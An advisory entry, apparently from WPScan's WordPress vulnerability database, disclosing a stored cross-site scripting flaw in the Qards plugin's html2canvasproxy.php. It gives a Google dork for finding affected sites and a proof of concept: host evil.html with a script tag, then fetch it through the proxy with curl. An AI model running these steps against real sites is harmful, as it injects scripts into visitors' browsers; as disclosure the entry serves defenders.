WordPress Plugin Vulnerabilities
Qards - Stored Cross-Site Scripting (XSS)
Description
Google Dork: inurl:"plugins/qards"
Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.
Proof of Concept
The vulnerable script http://target/wp-content/plugins/qards/html2canvasproxy.php
get the value of the "url" parameter and, using CURL PHP functions, saves the website's content to a file at /wp-content/plugins/qards/images/ with a filename formatted as following:
<hash md5>.<mime-type>
On a web server with "Directory Listing" enabled, you could easily find that file.
Due to improper sanitization, the generated file, suffer from a persistent XSS vulnerability.
POC:
1. create a remote file (evil.html), on your webserver, with the following content:
<script> alert('XSS'); </script>
2. curl 'http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://yourserver/evil.html'
3. Browse to http://target/wp-content/plugins/qards/images/ to get the file
Affects Plugins
No known fix References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
theMiddle
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-10-11 (about 6 years ago)
Added
2017-10-17 (about 6 years ago)
Last Updated
2020-10-02 (about 3 years ago)
WPScan 